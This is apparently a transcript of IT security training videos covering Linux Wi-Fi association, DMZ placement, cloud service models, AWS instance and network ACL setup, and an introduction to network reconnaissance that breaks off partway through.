symbol – to create a file here called linksys.conf. It could be called anything. Now the next
thing I want to do is just view that. I'll use the cat command [He executes the following commands:
wpa_passphrase linksys urnotFam0us > linksys.conf and cat linksys.conf.] to take a peek at what it did. And
notice that it commented out the text version of my passphrase. So now we've got our preshared key in a form
that is usable to associate with the access point. So, to make that happen, we're going to use the
wpa_supplicant command. Now this is kind of a weird Linux command in that when you use command-line
parameters like -D for the driver, the value isn't separated from the parameter by a space as is normally the
case. Here it's right up against it. That also goes for the -i or interface parameter. I'm going to give it wlan0,
no space, -c for the config file, no space, it's called linksys.conf. And I will go ahead and press Enter. [He
executes the following command: wpa_supplicant -Dwext -iwlan0 -clinksys.conf.]
Now, after that's completed, if I type iwconfig, I can see that our wlan0 interface is now associated with the
linksys SSID. So we have an association with the access point. I could then use the dhclient command and
specify wlan0 to make sure that DHCP executes for the interface so that we get an IP address. And then I
can use the ifconfig command to show all my interfaces including wlan0, [He executes the following
command: ifconfig.] which we can see here now has an IP address. So, if we were to ping something, for
example, on the Internet to verify we have connectivity, we can see indeed that it is working. [He executes the
following command: ping www.google.com.]
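To recap the Linux portion of this demo, here's the whole workflow as a hedged sketch. It assumes the interface is wlan0 and the target network is linksys; the passphrase is a placeholder, and -B is added so wpa_supplicant runs in the background rather than holding the terminal.

  iw dev                                                       # list wireless interfaces
  iwlist wlan0 scan | grep SSID                                # show the SSIDs visible from this station
  wpa_passphrase linksys 'YourPassphraseHere' > linksys.conf   # hash the passphrase into a config file
  wpa_supplicant -B -Dwext -iwlan0 -clinksys.conf              # associate with the access point
  dhclient wlan0                                               # obtain an IP address via DHCP
  ping -c 4 www.google.com                                     # verify connectivity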
In this video, we learned how to use common wireless tools in Windows and Linux.
In this video, find out how to determine the placement of network devices.
Objectives
[Topic title: Internal and External Networks. The presenter is Dan Lachance.] The placement of network
services is a big part of security configuration. In this video, we'll talk about internal and external networks. An
internal network will contain sensitive IT systems, including things like directory servers – like an Active
Directory domain controller, file servers, database servers, and intranet web servers. Now encryption should
also be used for network traffic internally. Most networks tend to use it externally when transmitting e-mail or
connecting to an external web site, but we should also consider that many network attacks occur from the
inside.
So we should use encryption, then, for both data in motion – data being transmitted over the network – and data at
rest – encrypted hard disks and encrypted files. And we might also be required to do this for regulatory
compliance. That's definitely the case if you're looking for PCI-DSS compliance if you're a retailer that deals
with cardholder information, for example.
External networks are public facing such as a demilitarized zone or a DMZ. A DMZ is either a couple of
switchports or it could be an entire network segment that is visible to a public facing network like the Internet,
but also has controlled access to an internal network. Now the DMZ is where you place things like VPN
appliances and public HTTP and FTP sites because they need to be reachable from the Internet. However, we
should never replicate data from our internal network to external. So, for example, if you use Microsoft Active
Directory domain controllers, you would never replicate from an internal domain controller to one that's in the
DMZ. We should also host logs outside of those devices or hosts in the DMZ because if it's in the DMZ, it's
reachable from the Internet and it potentially could be compromised. And a compromised host means that the
log files on that host are also compromised. So log forwarding should be configured to an internal secured
host. And you can do that on Windows as well as UNIX and Linux.
Then there are cloud virtual networks where our on-premises network can be extended to a cloud virtual
network. It's kind of like having another network on-premises, except you really access it through the Internet.
This is often done through a site-to-site VPN link between your on-premises network and your public cloud
provider. Or you might even have a dedicated leased line between your site and the cloud provider that doesn't
go through the Internet. Then there are cellular networks which are also considered external. We don't control
them. Mobile device users, if you think about it, really present an enormous risk for malicious user entry into
the enterprise because if a smartphone is compromised, then any of the apps and data...now often data won't
actually be stored on the smartphone. But there are apps that users use to access sensitive data through the
phone. If the phone is compromised, potentially that data could be as well. So it's crucial that we think about
smartphones and tablets as computers. They should have a firewall, virus scanner, firmware updates, they
should be hardened, and so on.
Now all of those things are really more IT geek things. But, at the end of the day, the most important thing is
user awareness. People that use smartphones and tablets on work networks need to be aware of not visiting
web sites they should not be looking at, keeping things up to date, and not opening e-mails they were not
expecting because they might be phishing attacks, and so on. DLP stands for data loss prevention. This
gives us central control of how apps and data can be used. You have to have a tool that does this. And it's often
used with mobile device management or MDM-centralized tools to manage mobile devices. So, for example,
what this means is we might have file attachments in a company e-mail app that can be accessed within the e-
mail or stored on corporate file servers, but can't be stored on a personal cloud storage account – we're
preventing that sensitive data loss. All internal and external devices need to be patched. They need to have
antimalware running and up to date. They need to have a personal firewall app configured appropriately for
your network and what should be allowed into and out of the device. And we should also be encrypting both
data in motion and data at rest. When we think about demilitarized zones – or DMZs – and host placement,
anything that needs to be publicly accessible from the Internet goes there. So, if you are using a VPN
solution, for example, so that travelling users and your home users that work from home can get into the
company network, then they need to be able to connect over the Internet to at least the VPN public interface.
So normally, the VPN appliance would be in the DMZ or it might appear that way. You might actually be
using a reverse proxy that users connect to, which in turn sends that connection on to a VPN device located
elsewhere internally. There are many ways to configure it. But, generally speaking, we don't put sensitive
information in the DMZ. We put public-facing services that require Internet access there. Now many home
wireless routers, like the one I'm looking at here – my ASUS wireless router – will allow you to set up DMZ
configurations. The same idea is available, of course, at the corporate level using enterprise equipment. So here
in my ASUS wireless router configuration tool. [The configuration page of the ASUS Wireless router
configuration tool opens.] Over on the left, I am going to click on WAN for wide area network since, as we
know, the DMZ really is public facing. [In the Advanced Settings subsection of the first section of the
configuration page, he clicks the WAN option. As a result, its information is displayed in the second section
which includes several tabs such as Internet Connection, Dual WAN, and Port Trigger.] Now what I want to
do here is click on the DMZ tab up at the top, and down below the DMZ has not been enabled. So I can choose
the Yes radio button where I can put in the IP address of a station or a device or a server that I want reachable
from the outside. Now, in a true enterprise environment, you will have many more configuration options than
this. But it's available even with standard consumer wireless products. In this video, we talked about internal
and external networks.
Table of Contents
After completing this video, you will be able to explain the purpose of cloud computing.
Objectives
[Topic title: Cloud Concepts. The presenter is Dan Lachance.] In this video, we'll have a chat about cloud
concepts. Cloud computing is interesting because really we are using technological solutions that we've
already had for a while, we're just using them in a different way. Cloud computing has a number of
characteristics, one of which is on-demand and self-service. This means that at any time, we should be able to
connect over the Internet, for example, to some kind of a web interface and provision resources as needed. So,
for example, if I need more cloud storage because I've run out of space, I should be able to provision that
immediately. The next characteristic is broad network access. We should be able to connect from anywhere
over the Internet pretty much using any type of device – whether it's an app on a smartphone or using a web
browser on a desktop computer to provision and work with cloud services. Resource pooling refers to the fact
that cloud providers have the infrastructure – they've got virtualization servers that can run virtual machines.
They've got all the network switching and routing equipment and firewall equipment, VPN equipment, storage
arrays that we can provision using easy to navigate web interfaces. So all of the cloud customers, or tenants as
they're called, are essentially sharing from this resource pool.
Rapid elasticity refers to the fact that we can provision as well as de-provision cloud services as needed. So, in
our previous example where we need more cloud storage either personally or even at the enterprise level, we
can expand that storage immediately. In the same way, we can reduce that service as we don't need it. Another
way to look at it is with virtual machines. If I need to test something on a server operating system, I can spin
up a virtual machine in the cloud in minutes. And then, when I'm finished testing, de-provision it so I don't
get charged for it any more. So measured service is a big part of cloud computing where all of our utilization
of IT resources is measured. So, for the amount of traffic into or out of a specific cloud service, you might be
charged a fee. You might also be charged for how much storage space you're using. Certainly, if you are
running virtual machines in the cloud, you're paying while they're running. Often you pay by the hour – in some
cases, maybe by the minute. Certainly, if you're running database instances in the cloud, you're being charged.
It's absolutely crucial that when you don't need a service in the cloud, that you de-provision it because
otherwise you could get a nasty surprise at the end of the month when you look at the bill for your usage.
Cloud computing also includes different categories of services. For example, IaaS stands for Infrastructure as a
Service. And, of course, this is going to include things like storage and virtual machines and so on. Platform as
a Service, or PaaS, includes things like specific operating system platforms and database platforms and
developer platforms that we can use in the cloud instead of having that on our own network. Software as a
Service – or SaaS – deals with software that users can interact with where really most of the work is done by
the provider. Think of things like cloud-based e-mail or cloud-based office productivity tools like Google Docs
or Microsoft Office 365 – those are SaaS. We'll talk about those more in another video.
Cloud computing implies virtualization. Virtual machines are being used. Now, in some cases with some cloud
providers, when you provision resources – let's say you provision a Microsoft SQL Server database in the
cloud or a MySQL database – you might not see the intricacies related to the virtual machine that runs your
database, but it is running in a virtual machine instance.
Now, even though cloud computing implies virtualization, the opposite is not true. So, just because you might
be using virtual machines on your corporate on-premises network, that doesn't mean you've got a private cloud
because we have to think about all the characteristics that we talked about when we began this discussion –
things like broad network access, rapid elasticity, and so on.
SDN stands for software-defined networking. And this is a big deal with cloud computing. Now, if you think
of an on-premises network, if you want to add another network or a subnet, then normally what you'll do is
physically get more cables, maybe another switch. You might even configure a VLAN within your switch. In
the cloud, we just use a nice, easy to work with interface or web page, and it will modify underlying network
infrastructure owned by the cloud provider to provision things like VPNs or subnets that run in the cloud.
That's software-defined networking.
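For a sense of what that looks like in practice, here's a hedged sketch using the AWS CLI, which drives the same software-defined networking layer as the web console. The CIDR ranges are arbitrary examples, and the VPC ID passed to the second command would come from the output of the first.

  # provision a new virtual network in the cloud
  aws ec2 create-vpc --cidr-block 10.0.0.0/16
  # carve a subnet out of that virtual network (the VPC ID below is a placeholder)
  aws ec2 create-subnet --vpc-id vpc-0123456789abcdef0 --cidr-block 10.0.1.0/24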
Virtualization, as we said, doesn't imply cloud computing. In order to have a cloud – whether it's a private
cloud on your on-premises equipment that you control and own or in the public cloud – you've got to meet all
of those cloud characteristics that we discussed at the beginning of this chat. Private clouds mean that we have
those characteristics on company-controlled infrastructure. Public cloud, of course, means it's on cloud
provider infrastructure. Availability is very important because when you think about cloud computing,
especially public cloud computing, you're really trusting somebody else to host potentially crucial IT services.
And you've got a network connection that you need to have up and running to get to those services. So we
either connect over the Internet or through a dedicated leased line which doesn't use the Internet from our on-
premises network to the cloud. We could also have a site-to-site VPN, essentially a VPN tunnel, between our
network and the public cloud provider. Certainly, we should have redundant Internet connections. For instance,
if we're using the Internet, in case one connection goes down, we still need to be able to make a connection to
our IT services running in the cloud in some other way.
Then there is data replication. Now we could replicate data within provider data centers. This is common with
public cloud providers. For redundancy and availability of your data, it's replicated between different data
centers and, in some cases, even between different regions within a country. You may or may not pay an
extra fee for that redundancy; it really depends on the cloud provider. But that is an option. Now this provides
high availability. The other aspect related to this is that we – as IT and server people for on-premises networks
– can also configure replication from on-premises data sources to the cloud as well for high availability.
That could also be in the form of cloud backup. In this video, we discussed cloud concepts.
Upon completion of this video, you will be able to recognize the use of cloud service models.
Objectives
[Topic title: Cloud Service Models. The presenter is Dan Lachance.] In this video, I'll discuss cloud service
models. With cloud computing, as we've mentioned, we're really just using technology that we've had for a
while in a different way. And that's where the whole service model kicks in. With cloud computing, we pay as
we go. We have metered usage. This also applies to private clouds. We have departmental chargeback we
might use within an organization for IT service consumption by different departments within the company. So
it's a metered usage, meaning it's like electricity or water. You pay only for what you use. So, as a result, it's
important that you stop, disable, or delete deployed resources in the cloud when you aren't using them. Billing
might continue otherwise – you're going to pay more than you really need to. And, also at the same time,
because you've got more out there and more running that isn't necessary, it increases your attack surface.
The SLA is the service-level agreement. This is a contractual document between a cloud service provider and a
consumer that guarantees things like uptime, response time – which could relate to, for example, how quickly
your web site hosted in the cloud responds. It also could relate to how quickly tech support from the cloud
provider responds when there is an issue. Those types of things are what you will see within a service-level
agreement. [The aws.amazon.com web site is open. In this, the Amazon EC2 Service Level Agreement web
page is open.] For example, what you're seeing here is the Amazon Web Services EC2 Service Level
Agreement.
Now EC2 is used to deploy virtual machines into the Amazon cloud. So, as I scroll through the service-level
agreement, I can see the Service Commitment, the definition of terms, and any credits that might be provided
to consumers when Amazon Web Services doesn't keep up with their end of the agreement. There are many
different categories of cloud service models. Here we'll just talk about the three big ones – beginning with
Infrastructure as a Service or IaaS.
This means that the cloud provider has little management responsibility; it's on you – the cloud consumer –
because you might deploy things like virtual machines. So it's up to you what you call them, that they are
accessible, that they have the correct network addresses, and so on. The same goes for things like virtual
networks or cloud storage that you use in the cloud environment. It's up to you to deploy it correctly and to
determine what you need and how it should be configured. Platform as a Service, or PaaS, has some
management responsibility on the cloud provider, the rest is on you – the consumer. This is primarily used by
developers where there are developer tools, like web and worker roles for web apps, message queues where
one application component can drop a message that gets read by another component when the other component
is available instead of relying on it in real-time. That's called loose coupling when it comes to development.
Then there are database instances, like Microsoft SQL Server or the open-source MySQL, that you might
deploy in the cloud on Platform as a Service. Software as a Service or SaaS means that the cloud provider has
the most management responsibility compared to the other models like Infrastructure as a Service and Platform
as a Service.
So think of Google Apps, Office 365 – where, essentially, it's up to the cloud provider to keep those patched
and up and running. We just use those applications in the cloud, save our data. And that's pretty much our
responsibility as cloud consumers. In this video, we discussed cloud service models.
After completing this video, you will be able to recognize the role of virtualization in cloud computing.
Objectives
[Topic title: Virtualization. The presenter is Dan Lachance.] In this video, I'll demonstrate how to work with
operating system virtualization. These days you can work with virtual machines either on-premises – so with
the equipment that is owned by you or your organization that is completely under your control – or you can
deploy virtual machine instances into the cloud on cloud provider equipment. Let's start with on-premises.
Here, I've got VMware Workstation. [The VMware Workstation window is open. Running along the top of the
window, there is a menu bar with several menus such as File, Edit, and View. Below the menu bar, several
tabs are open such as Home, Srv2012-1 - Server+, and Windows 10. The Home tab is selected by default. The
vmware Workstation 10 section is open in the Home tabbed page. It consists of several links such as Create a
New Virtual Machine, Open a Virtual Machine, and Virtualize a Physical Machine.]
Now there are many other virtualization tools you might be using like VirtualBox or Microsoft Hyper-V and so
on. However, notice here in VMware Workstation, if I were to click the Create a New Virtual Machine
link, [Dan clicks the Create a New Virtual Machine link. As a result, the New Virtual Machine Wizard
opens.] it starts a wizard where I'm asked questions about where the installer file or disc is for the operating
system. Here, I'll just leave it on I will install the operating system later. Then I'm asked which flavor of the
Guest operating system it will be – Microsoft Windows, Linux, Novell NetWare, Solaris, UNIX, and so on.
And, as I proceed, I get to give it things like a name, a storage location, and so on. Now we can also deploy
virtual machines [He clicks the Cancel button of the New Virtual Machine Wizard.] in the cloud very quickly.
And, of course, we only get charged for what we're using while the virtual machine is running. Here, for
example, I'm using Amazon Web Services in the public cloud, [The amazon.com web site is open. In this, the
AWS Management Console web page is open. The presenter is logged in his account. Running along the top of
the web site, there are several drop-down menus such as AWS, Services, and Edit. The Amazon Web Services
section is open. It contains several subsections such as Compute, Developer Tools, and Management
Tools.] but I just as well could be using Rackspace or Microsoft Azure.
Here I'm going to go click on EC2, [In the Compute subsection, he clicks the EC2 option.] which is what is
used for virtual machines launched into the Amazon Web Services cloud. Now what I want to do in this
console is click on Instances on the left. [The EC2 Dashboard is open. It is divided into two sections. The first
section is a navigation pane. The second section displays the information on the basis of the selection made in
the first section. The navigation pane includes several expandable nodes such as INSTANCES, IMAGES, and
ELASTIC BLOCK STORE. In INSTANCES expandable node, he clicks the Instances option.] This should
show me any virtual machine instances I've already deployed in the cloud. Now, if I don't have any, of
course, [Due to the selection of Instances option, the second section displays its information. It includes two
buttons: Launch Instance and Connect. Adjacent to them, there is the Actions drop-down menu.] I can click
the Launch Instance button to do that. So, essentially, what I'm doing is building a virtual machine through a web-
based interface. [After clicking the Launch Instance button, a page opens which is titled Step 1: Choose an
Amazon Machine Image (AMI). It is divided into two sections. The first section is a navigation pane in which
Quick Start option is selected by default. Due to the selection made in the first section, its information is
displayed in the second section. The second section displays several virtual machine templates.] Here I've got
a gallery of essentially virtual machine templates for various Linux distributions. And, as I go further and
further down, I can see various Windows server operating systems that I can use when deploying a virtual
machine in the cloud. I can also click on the AWS Marketplace link on the left [He clicks the AWS
Marketplace option from the Navigation pane.] and search for specific virtual machine templates that might
have applications preconfigured, or virtual appliances – like for network-attached storage and so on.
So, in this case, what I'm going to do is go back, do Quick Start, and I'll just choose Amazon Linux [He clicks
the Quick Start option in the navigation pane. Then from the second section, he selects the first virtual
machine template titled: Amazon Linux AMI 2016.03.3 (HVM), SSD Volume Type. He clicks the Select button
which is adjacent to this template.] and I'll just click Select. And, just like building a virtual machine on-
premises, it's going to ask me a number of questions. In this case, it wants to know the sizing type – in other
words – how many virtual CPUs or vCPUs, how much RAM, and so on. [Now a page opens which is titled
Step 2: Choose an Instance Type. It contains two drop-down menus: All instance types and Current
generation. Below them, there is a table of various available instances. The information displayed for every
instance is: Family, Type, vCPUs, Memory (GiB), Instance Storage (GB), EBS-Optimized Available, and
Network Performance.]
I'm just going to accept this and go to the next step [He clicks the Next: Configure Instance Details button. As
a result, a page opens which is titled Step 3: Configure Instance Details.] where I can determine which virtual
network in the cloud I want this to be deployed into, [The Configure Instance Details page opens which
includes several fields such as Network, Subnet, Auto-assign Public IP, and IAM role.] and whether it should
have a public IP address – I'm going to Enable that option. [He clicks the drop-down list box which is adjacent
to the Auto-assign Public IP field. He selects the Enable option.] So I'm just going to click the Review and
Launch button in the bottom right. [Now a page opens which is titled Step 7: Review Instance Launch. It
includes sections such as AMI Details and Instance Type. The page contains Cancel, Previous, and Launch
buttons.] I'll click the Launch button. Now, in the cloud, [The following dialog box opens: Select an existing
key pair or create a new key pair.] what's interesting about this specific cloud provider is that I have to create
– or, in this case, choose – an existing key pair that will be used to authenticate to that virtual machine. So I'm
going to acknowledge that I've got the private key portion that will allow me to authenticate. So then I would
just click Launch Instances. And, at this point, it's launching that virtual machine – in this case, it's using
Amazon Linux in the cloud. [The page titled Launch Status opens. It includes the following section: Your
instances are now launching. This section contains the following link: i-fb167b03.] So I can go ahead and
click on the link for that and see how it's doing. So it's very quick and easy to launch a virtual machine into the
cloud. It's equally easy in the future to remove it or stop it. [The section corresponding to the Instances
option opens again. It contains two buttons: Launch Instance and Connect. Adjacent to them, there is the
Actions drop-down menu. Below this, the status of the following Instance ID is displayed: i-fb167b03.
Below this, its information is displayed. The information contains the following tabs: Description,
Status Checks, Monitoring, and Tags. The Description tab is selected by default.] So, having a virtual machine
selected, I can go to the Actions button here, and under Instance State, I could Stop it or Terminate it – which
means delete it. [He clicks the Actions drop-down menu. Then a list of options appears, he refers to the
Instance Settings option. On clicking it, a flyout menu appears which includes options such as Stop and
Terminate.]
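The same stop and terminate actions can also be scripted with the AWS CLI rather than the console; here's a hedged sketch using the instance ID from this demo.

  # stop the instance (compute billing stops; attached storage may still incur charges)
  aws ec2 stop-instances --instance-ids i-fb167b03
  # or terminate it entirely, which deletes the instance
  aws ec2 terminate-instances --instance-ids i-fb167b03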
Now you want to make sure that you stop any cloud services when you no longer need them because
depending on the provider, you'll still be charged. So you don't want to leave virtual machines running for
months because you're still going to be paying for that usage even if you're not actually using them. Notice,
here at the top, I've got an option to connect to the selected virtual machine. So, when I click Connect – in this
case, because it's Linux, [He clicks the Connect button at the top. As a result, the Connect to Your Instance
dialog box opens. He refers to the options in the following field: I would like to connect with.] I can do it using
a standalone SSH client like PuTTY or I could use a Java SSH client in my web browser. Now I don't have to
do it this way. For example, I could simply use the free PuTTY tool to make a connection from my local
station over the Internet [He closes the Connect to Your Instance dialog box.] to that virtual machine in the
cloud, which we are going to do.
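As an aside, if you'd rather not use PuTTY, the equivalent connection from a Linux or macOS terminal uses the OpenSSH client; a minimal sketch, with the key file name and public IP address as placeholders:

  # authenticate with the downloaded private key as the default Amazon Linux user
  ssh -i mykey.pem ec2-user@203.0.113.10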
Now, before I do that though, I need to take note of either the Public DNS name down here or IP address of
this host. [Under the Description tab, he refers to the Public IP of the Instance ID.] I'm going to Copy the
Public IP address. Here, on my Windows station, I've downloaded and run the PuTTY tool [The PuTTY
Configuration dialog box is open.] where I've put in the public IP address of my cloud virtual machine. I'm
connecting over Port 22. [The dialog box is divided into two sections. The second section is titled Basic
options for your PuTTY session. He refers to the entries filled in the second section.] Because it's a Linux host,
I want to SSH to it. And I've also gone down here under Connection - SSH - Auth on the left [In the first
section, he clicks the Auth subnode which is under SSH subnode. And the SSH subnode is under the
Connection node.] and enabled agent forwarding because it requires public key authentication. I've already
loaded my private key to be able to do that. So now I would click Open. And, of course, it asks me to login.
So, in this particular case, I know the username that is required to authenticate, [The following window opens:
ec2-user@ip-10-0-0-186:~. In this, he types the following: ec2-user.] and I'm in. I am now logged in to my
Linux cloud-based virtual machine. In this video, we learned about server virtualization.
[Topic title: Cloud Security Options. The presenter is Dan Lachance.] In this video, I'll talk about cloud
security options. One of the big showstoppers with cloud computing adoption is trusting a third party to deal
with, perhaps, sensitive data or IT systems. And, in some cases, due to legal or regulatory reasons, you can't
use public cloud providers, you've got to deal with on-premises storage and running of IT systems.
The first thing to consider is are public cloud providers hacking targets? Because there are thousands of tenants
sharing pooled IT resources. So aren't they a bigger target? Well, to a degree, there is some truth in that. But, at
the same time, with public cloud providers, economies of scale – because they have so many customers –
allow them to focus on strong security. It's in their interest because that's their business. And they also have to
go through third-party audit compliance constantly to make sure that their IT practices and systems are
hardened and trustworthy. There is also replication both within and between different provider data centers.
This allows for high availability of IT systems as well as data. So it's part of business continuity to keep
business operations running even if we have an entire data center that's not reachable for some reason.
Then there is encryption of data in motion, data being transmitted over the network. Now that needs to be
done, of course, over the Internet, but also on internal networks or even private cloud networks
where you might deploy virtual machines that talk to each other only within that cloud virtual network. Data at
rest means that we've got stored data that should also be encrypted. Now we might have to manually encrypt
data before we store it in the cloud, or encryption might be available from the cloud provider. In this example, I am going
to upload a file to a cloud storage location. [The amazon.com web site is open. In this, the S3 Management
Console web page is open. Running along the top of the page, there are drop-down menus such as AWS,
Services, and Edit. Below this, there are buttons: Upload, Create Folder, None, Properties, and Transfers. The
None button is selected by default. Also there is an Actions drop-down menu adjacent to the Create Folder
button.] So here I'm just going to go to the Actions menu. And I'm going to choose Upload.
Now, once I've added a file to upload here, it's just a small text file. [The Upload - Select Files and Folders
wizard is open. Dan refers to the following file that he had added for upload: Project_A.txt. The wizard also
contains the following buttons: Set Details, Start Upload, and Cancel.] As I go through the wizard – here I'm
going to click Set Details at the bottom – notice I have the option to Use Server Side Encryption. [On clicking
the Set Details button, the section now contains several radio buttons and a checkbox. The Use Standard
Storage radio button is selected by default. He checks the following checkbox: Use Server Side Encryption.
Under this, the following radio button is selected by default: Use the Amazon S3 Service master key. The
wizard now contains the following buttons: Select Files, Set Permissions, Start Upload, and Cancel.] So this is
one way that we can deal with cloud encryption for data at rest. We also will have to think about the cloud
provider and how they remove data.
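As a quick aside before we get to data removal, the same server-side encryption option can be requested when uploading from the AWS command line interface. This is only a sketch, and the bucket name is hypothetical:

# upload a file to S3 and ask S3 to encrypt it at rest with the S3-managed master key
aws s3 cp Project_A.txt s3://example-project-bucket/ --sse AES256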
Now, of course, we can remove data stored in the cloud ourselves, but there may be data remnants that are still available after the fact. Reputable providers have specific data sanitization practices they use to make sure that, when we delete data, nobody else can get to it. Then there are virtual machines in terms of security, where we might
configure them such that data center administrators can only start or stop virtual machines that we create or
perhaps even not. That would depend on your cloud provider and how you structure your virtual machines and
also what the provider supports. There is this concept called shielded virtual machines whereby the contents of
the virtual machine – running services and data – are completely inaccessible by data center administrators. All
they can do is essentially stop the VM.
Virtual networks are similar to creating a real network on-premises except it's done in the cloud on provider
equipment. So this is a network segment created in the cloud. We can also apply firewall rules for both
inbound and outbound traffic. Ideally, if they're not already set up this way, you want to configure those rules to deny all traffic by default and then poke holes in that firewall only for what is needed. Whether you are using
Microsoft Azure, Rackspace, or – in this case – Amazon Web Services, they all have similar options. [The
amazon.com web site is open. In this, the VPC Management Console web page is open. In this web page, the
VPC Dashboard is open. The page is divided into sections. The first section is a navigation pane which
includes options such as Virtual Private Cloud and Security. Under the Virtual Private Cloud, the Your VPC's
suboption is selected by default. The second section displays the information on the basis of the selection made
in the first section. The second section contains a Create VPC button and an Actions drop-down menu. Below
this, it shows the status of the following VPC: PubVPC1. Its information is displayed below. The information
includes three tabs: Summary, Flow Logs, and Tags. The Summary tab is selected by default.] For example,
here I've got PubVPC1, a virtual private cloud. This is just a virtual network in the cloud.
Now, if I select it, down below under the summary area to the right, there is a network access control list or
network ACL for this network I've deployed in the cloud. And, if I click on the link for it, it opens up a new
window. And here I can control both inbound and outbound traffic – so traffic coming in to this network in the
cloud or leaving. [A second tab opens in the web browser. The amazon.com web site is open in it. In this, the
VPC Management Console web page is open. In this web page also, the VPC Dashboard is open. The second
section now contains a Create Network ACL button and a Delete button. The information of the following
Network ACL ID is displayed: acl-2b85aa4c. Below this, there are several tabs such as Summary, Inbound
Rules, and Outbound Rules. He clicks the Inbound Rules tab.] So I'm going to select the ACL from the list.
Down below, if I click Inbound Rules, I can see the rules that ALLOW traffic from certain locations or DENY
it. Of course, I could click the Edit button. And, if I really wanted to, I could add new rules. If I click Add
another rule, [He clicks the Add another rule button.] I can choose whether I want it to be for SMTP (25), SSH
(22), ALL Traffic, ALL TCP, ALL UDP, and so on and so forth. [He clicks the Search bar below the Create
Network ACL button and refers to the options that appear on clicking it.] I can also determine the port or Port
Range and the Source IP address or network from which the connection comes. Now that's Inbound
Rules. In the cloud, regardless of cloud provider, we can also control traffic leaving a network that's deployed
in the cloud. So there are outbound rules here down under the Outbound Rules tab.
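For those who prefer the command line, a rule like the ones shown here can also be added with the AWS CLI. This is just a sketch; the rule number and source CIDR block below are hypothetical:

# allow inbound SSH (TCP 22) on this network ACL from one specific source network
aws ec2 create-network-acl-entry --network-acl-id acl-2b85aa4c --ingress --rule-number 110 --protocol tcp --port-range From=22,To=22 --cidr-block 203.0.113.0/24 --rule-action allow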
Cloud computing implies virtualization whether we, as cloud customers, make the virtual machines ourselves
or whether they're built when we run some kind of a wizard for some cloud service. Virtual machines can be
created in the cloud from provider template galleries for a quick and easy deployment or you can manually
create virtual machines in the cloud yourself. You can even migrate existing on-premises virtual machines to the cloud to reuse the investment you have already made in building them. Now, when it comes to hardening, you follow standard operating system hardening guidelines. There really is nothing different about hardening a virtual machine in the cloud than there is for a server you're hosting within your own office network or your own data center. So things like following the principle of least privilege, applying the latest software patches, reducing the number of running services, changing default configurations – that stuff doesn't really change whether you are talking about a virtual machine in the public cloud or a physical server or a virtual machine running on-premises under your control.
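As a small, hedged example of that kind of hardening on a Linux virtual machine – cloud-hosted or not – you might review what starts automatically and trim anything unneeded; the service name here is just a placeholder:

# list services that are enabled to start automatically
systemctl list-unit-files --state=enabled
# disable and immediately stop a service that isn't needed
systemctl disable --now telnet.socket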
Now cloud management interfaces normally use HTTPS. Normally, we administer our cloud services through
a web browser interface that's secured. We might also consider enabling auditing of activity so we can track who deployed or deprovisioned what in the cloud and when. We can also use role-based administration so that
we might assign a role with permissions to certain users so they can do only what is required to get the job
done. Again, that adheres to the principle of least privilege. In this video, we discussed cloud security options.
Table of Contents
After completing this video, you will be able to explain how to discover network devices.
Objectives
[Topic title: Topology, Service Discovery, and OS Fingerprinting. The presenter is Dan Lachance.] In this
video, I'll discuss topology, service discovery, and OS fingerprinting. Network intrusions always begin with
reconnaissance performed by the bad guys. This includes mapping out the network layout – so how the
network is laid out and also the devices and where they are laid out within that network infrastructure.
Documentation is used by the network owners and network technicians as a means of effective
troubleshooting. The more we know about how a network is laid out and where things are and what their
addresses are, what their names are, the better we are at troubleshooting and quickly resolving issues. But, if
that documentation falls into the wrong hands, it makes it very easy for attackers to start trying to exploit
vulnerabilities that might exist. So this documentation, aside from troubleshooting, also allows the network
owners and network technicians to squeeze the absolute most performance out of what they have because they
can visualize where things are, how they're working, and optimize network links and network services and so
on.
Now, when we talk about discovering devices on a network through reconnaissance, that can happen in many,
many ways. One of those ways is through a Layer 2 type of discovery. Now Layer 2 of the OSI model is the
data-link layer where we might be able to discover things at the hardware layer on the local network only. So
things like MAC addresses come to mind when we talk about Layer 2. Layer 3 discovery can go outside of the
boundary of a local area network because Layer 3 – if you recall – of the OSI model is the network layer. It
deals with things like routers and routing of traffic from one network to another. And, at the software protocol
level, it deals with things like IP addresses.
SNMP is an old protocol – the Simple Network Management Protocol. And what's interesting about it is that
network devices use some kind of an SNMP agent that listens on UDP port 161. Now not every device will
have this SNMP agent listening, but often it is running automatically – whether we are talking about a software
appliance or even a hardware appliance on the network. Now the agent is listening on UDP port 161. We need
an SNMP server-side component that queries that SNMP agent on devices and looks through the MIBs on the
device. A MIB is a management information base that contains different types of information about that
specific device type. So, for example, if it's a network switch, we might have a MIB that shows us how
VLANs are configured, which devices are connected to which ports, how many devices are connected, amount
of traffic into and out of the switch as a whole or each port – that type of information. Topology discovery,
aside from SNMP, can also occur by querying centralized resources on the network, like DHCP servers. DHCP
servers hand out IP configuration to client devices. That would be a great way to learn about what's on a
network if you can query the DHCP server and get a list of active leases and details related to that. Then there
is also querying DNS servers, where we could query for many types of records, including A records for IPv4 and AAAA (quad-A) records for IPv6. So we can learn the names of devices and hosts and their corresponding IPs.
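To make those discovery paths a little more concrete, here is a hedged sketch of the kinds of queries involved; the community string, addresses, and host name are purely hypothetical:

# walk the system group of an SNMP agent listening on UDP 161 (net-snmp tools)
snmpwalk -v 2c -c public 192.168.1.1 system
# ask a DNS server for the IPv4 (A) and IPv6 (AAAA) records of an internal host
dig hrpayroll1.corp.example.com A
dig hrpayroll1.corp.example.com AAAA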
Now knowing the name of something can sometimes imply what it is – you know, a name like HR payroll server one is pretty indicative of what it is. And, if we find that name in DNS easily, we can also find the IP address for it. Now, ideally, you're not going to be able to find that type of information in a public DNS server on the Internet. But, if a malicious user can somehow get onto your internal network and query internal DNS servers, they very well could find that type of information. So it takes one thing away from what they have to learn to get into the HR payroll servers.
Topology discovery can also be done by querying other types of devices like routers – where routers maintain
information about network links that they are connected to. Routers also have memory – just like switches do,
just like servers do, and so on. On a router, the memory is used to store routing table entries. So it uses this
when it receives an inbound packet from an interface to determine the best way to route it through another
interface to some remote network somewhere. Each router will also communicate with other routers using various protocols like the Cisco Discovery Protocol, or CDP. That's a Layer 2 protocol used to
discover other types of devices and information about them – specifically routers on the same network link.
Then for Juniper systems, there is Juniper Discovery Protocol, or JDP.
Switches maintain information about their connected devices and how VLANs are configured. So a malicious user might do reconnaissance against a switch, maybe because there is a simple password to remotely connect to it through SSH...or, heaven forbid, because we are using telnet to connect to the switch, which means an attacker simply has to capture a valid user connecting to the switch and providing their credentials, because telnet doesn't encrypt or even encode anything. Then another way to discover items on the network is through
Address Resolution Protocol cache discovery. Address Resolution Protocol or ARP is part of TCP/IP. And it's
